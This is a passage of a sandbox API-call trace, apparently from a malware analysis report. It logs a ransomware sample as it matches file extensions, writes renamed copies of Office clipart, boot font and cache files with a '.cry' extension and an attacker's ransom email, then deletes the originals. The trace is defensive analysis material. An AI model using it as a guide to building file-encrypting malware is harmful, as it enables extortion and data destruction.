lpString2=".WMF") returned 1 [0055.272] lstrlenW (lpString=".xlsx") returned 5 [0055.272] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.272] lstrlenW (lpString=".ppt") returned 4 [0055.272] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0055.272] lstrlenW (lpString=".zip") returned 4 [0055.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.272] lstrlenW (lpString=".rar") returned 4 [0055.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString=".bz2") returned 4 [0055.272] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString=".7z") returned 3 [0055.272] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0055.272] lstrlenW (lpString=".dbf") returned 4 [0055.272] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0055.272] lstrlenW (lpString=".1cd") returned 4 [0055.272] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0055.272] lstrlenW (lpString=".jpg") returned 4 [0055.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.273] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.273] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0055.273] GetLastError () returned 0x0 [0055.273] ReadFile (in: hFile=0x1fc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x504a, lpOverlapped=0x0) returned 1 [0055.484] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5050, lpOverlapped=0x0) returned 1 [0055.485] ReadFile (in: hFile=0x1fc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.485] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.485] SetEndOfFile (hFile=0x1bc) returned 1 [0055.485] CloseHandle (hObject=0x1bc) returned 1 [0055.485] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.485] SetEndOfFile (hFile=0x1fc) returned 1 [0055.486] CloseHandle (hObject=0x1fc) returned 1 [0055.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0055.487] lstrlenW (lpString=".doc") returned 4 [0055.487] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString=".docx") returned 5 [0055.487] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.487] lstrlenW (lpString=".pdf") returned 4 [0055.487] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString=".xls") returned 4 [0055.487] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.487] lstrlenW (lpString=".xlsx") returned 5 [0055.487] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.487] lstrlenW (lpString=".ppt") returned 4 [0055.487] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0055.487] lstrlenW (lpString=".zip") returned 4 [0055.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.487] lstrlenW (lpString=".rar") returned 4 [0055.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString=".bz2") returned 4 [0055.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString=".7z") returned 3 [0055.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0055.487] lstrlenW (lpString=".dbf") returned 4 [0055.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0055.487] lstrlenW (lpString=".1cd") returned 4 [0055.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0055.487] lstrlenW (lpString=".jpg") returned 4 [0055.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.522] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=20189) returned 1 [0055.522] CloseHandle (hObject=0x1fc) returned 1 [0055.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 0x20 [0055.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0055.522] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.522] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0055.523] GetLastError () returned 0x0 [0055.523] ReadFile (in: hFile=0x1fc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x4edd, lpOverlapped=0x0) returned 1 [0055.626] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4ee0, lpOverlapped=0x0) returned 1 [0055.636] ReadFile (in: hFile=0x1fc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.636] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.636] SetEndOfFile (hFile=0x1bc) returned 1 [0055.636] CloseHandle (hObject=0x1bc) returned 1 [0055.637] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.637] SetEndOfFile (hFile=0x1fc) returned 1 [0055.638] CloseHandle (hObject=0x1fc) returned 1 [0055.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0055.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0055.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0055.639] lstrlenW (lpString=".doc") returned 4 [0055.639] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0055.639] lstrlenW (lpString=".docx") returned 5 [0055.639] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0055.639] lstrlenW (lpString=".pdf") returned 4 [0055.639] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0055.639] lstrlenW (lpString=".xls") returned 4 [0055.639] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0055.639] lstrlenW (lpString=".xlsx") returned 5 [0055.639] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0055.639] lstrlenW (lpString=".ppt") returned 4 [0055.639] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0055.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0055.639] lstrlenW (lpString=".zip") returned 4 [0055.639] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0055.639] lstrlenW (lpString=".rar") returned 4 [0055.639] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0055.639] lstrlenW (lpString=".bz2") returned 4 [0055.639] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0055.639] lstrlenW (lpString=".7z") returned 3 [0055.639] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0055.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0055.639] lstrlenW (lpString=".dbf") returned 4 [0055.639] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0055.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0055.639] lstrlenW (lpString=".1cd") returned 4 [0055.639] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0055.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0055.639] lstrlenW (lpString=".jpg") returned 4 [0055.640] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0055.640] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=18304) returned 1 [0055.640] CloseHandle (hObject=0x1fc) returned 1 [0055.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 0x20 [0055.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0055.640] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.640] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0055.641] GetLastError () returned 0x0 [0055.641] ReadFile (in: hFile=0x1fc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x4780, lpOverlapped=0x0) returned 1 [0055.695] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4790, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4790, lpOverlapped=0x0) returned 1 [0055.696] ReadFile (in: hFile=0x1fc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.696] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.696] SetEndOfFile (hFile=0x1bc) returned 1 [0055.764] CloseHandle (hObject=0x1bc) returned 1 [0055.764] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.764] SetEndOfFile (hFile=0x1fc) returned 1 [0055.765] CloseHandle (hObject=0x1fc) returned 1 [0055.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 1 [0056.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.024] lstrlenW (lpString=".doc") returned 4 [0056.024] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.024] lstrlenW (lpString=".docx") returned 5 [0056.024] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.024] lstrlenW (lpString=".pdf") returned 4 [0056.024] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.024] lstrlenW (lpString=".xls") returned 4 [0056.024] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.024] lstrlenW (lpString=".xlsx") returned 5 [0056.024] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.024] lstrlenW (lpString=".ppt") returned 4 [0056.024] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.024] lstrlenW (lpString=".zip") returned 4 [0056.024] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.024] lstrlenW (lpString=".rar") returned 4 [0056.024] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.024] lstrlenW (lpString=".bz2") returned 4 [0056.024] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.024] lstrlenW (lpString=".7z") returned 3 [0056.024] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.024] lstrlenW (lpString=".dbf") returned 4 [0056.025] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.025] lstrlenW (lpString=".1cd") returned 4 [0056.025] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.025] lstrlenW (lpString=".jpg") returned 4 [0056.025] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 13 os_tid = 0x9f4 [0035.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x6e0b80 [0035.255] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x3850048 [0035.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504e0 [0035.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x653220 [0035.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6504f8 [0035.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3950020 [0035.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650510 [0035.256] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650510, Size=0x20) returned 0x67fd88 [0035.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650510 [0035.256] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650510, Size=0x20) returned 0x67fd60 [0035.256] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.256] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.256] Wow64DisableWow64FsRedirection (in: OldValue=0x2d9ff58 | out: OldValue=0x2d9ff58*=0x0) returned 1 [0035.256] lstrlenW (lpString="kernel32.dll") returned 12 [0035.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.257] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.257] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.257] Sleep (dwMilliseconds=0x64) [0035.450] lstrcmpiW (lpString1=".ttf", lpString2=".cry") returned 1 [0035.450] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0035.450] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0036.037] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1984228) returned 1 [0036.037] CloseHandle (hObject=0x174) returned 1 [0036.037] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0036.037] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.037] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0036.037] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.037] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.037] lstrlenW (lpString=".doc") returned 4 [0036.037] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0036.037] lstrlenW (lpString=".docx") returned 5 [0036.037] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0036.037] lstrlenW (lpString=".pdf") returned 4 [0036.037] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0036.037] lstrlenW (lpString=".xls") returned 4 [0036.038] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0036.038] lstrlenW (lpString=".xlsx") returned 5 [0036.038] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0036.038] lstrlenW (lpString=".ppt") returned 4 [0036.038] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.038] lstrlenW (lpString=".zip") returned 4 [0036.038] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0036.038] lstrlenW (lpString=".rar") returned 4 [0036.038] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString=".bz2") returned 4 [0036.038] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString=".7z") returned 3 [0036.038] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0036.038] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.038] lstrlenW (lpString=".dbf") returned 4 [0036.038] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.038] lstrlenW (lpString=".1cd") returned 4 [0036.038] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.038] lstrlenW (lpString=".jpg") returned 4 [0036.038] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.038] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.038] lstrlenW (lpString=".doc") returned 4 [0036.038] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString=".docx") returned 5 [0036.038] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0036.038] lstrlenW (lpString=".pdf") returned 4 [0036.038] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0036.038] lstrlenW (lpString=".xls") returned 4 [0036.038] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0036.038] lstrlenW (lpString=".xlsx") returned 5 [0036.038] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0036.038] lstrlenW (lpString=".ppt") returned 4 [0036.039] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0036.039] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.039] lstrlenW (lpString=".zip") returned 4 [0036.039] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0036.039] lstrlenW (lpString=".rar") returned 4 [0036.039] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0036.039] lstrlenW (lpString=".bz2") returned 4 [0036.039] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0036.039] lstrlenW (lpString=".7z") returned 3 [0036.039] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0036.039] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.039] lstrlenW (lpString=".dbf") returned 4 [0036.039] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0036.039] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.039] lstrlenW (lpString=".1cd") returned 4 [0036.039] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0036.039] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0036.039] lstrlenW (lpString=".jpg") returned 4 [0036.039] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0036.039] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0036.039] lstrlenW (lpString="PptLR.cab") returned 9 [0036.039] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0036.380] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=70361744) returned 1 [0036.380] CloseHandle (hObject=0x190) returned 1 [0036.380] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0036.380] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all 